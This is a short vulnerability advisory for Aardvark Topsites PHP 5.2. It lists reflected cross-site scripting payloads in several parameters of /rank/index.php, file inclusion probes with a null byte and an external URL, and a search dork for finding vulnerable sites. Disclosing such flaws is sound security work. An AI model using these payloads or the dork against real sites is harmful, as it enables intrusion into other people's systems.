Aardvark Topsites PHP version 5.2 suffers from cross site scripting and local file inclusion vulnerabilities.
940d50ace752c918217ecd81375f23ada65a4665f733eae8033d9b8298efa90c
Aardvark Topsites PHP 5.2 Multi Vulnerability
=============================================
Author : indoushka
Vondor : www.p30vel.ir http://www.aardvarktopsitesphp.com/ http://www.avatic.com/
Dork : My Topsites List - Powered by Aardvark Topsites PHP 5.2.1
======================================
Cross site scripting (verified) :
This vulnerability affects /rank/index.php.
Attack details :
URL encoded GET input q was set to 1" onmouseover=prompt(999881) bad="
The input is reflected inside a tag parameter between double quotes.
URL encoded POST input email was set to sample%40email.tst" onmouseover=prompt(932713) bad="
The input is reflected inside a tag parameter between double quotes.
URL encoded POST input title was set to Mr." onmouseover=prompt(903995) bad="
The input is reflected inside a tag parameter between double quotes.
URL encoded POST input u was set to 1" onmouseover=prompt(986160) bad="
The input is reflected inside a tag parameter between double quotes.
URL encoded POST input url was set to #" onmouseover=prompt(915056) //
The input is reflected inside a tag parameter between double quotes.
File inclusion :
URL encoded GET input l was set to http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg
Error message found:
Failed opening required '../languages/http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg.php'
URL encoded POST input sql was set to http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg
Error message found:
Failed opening required '../sources/sql/http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg.php'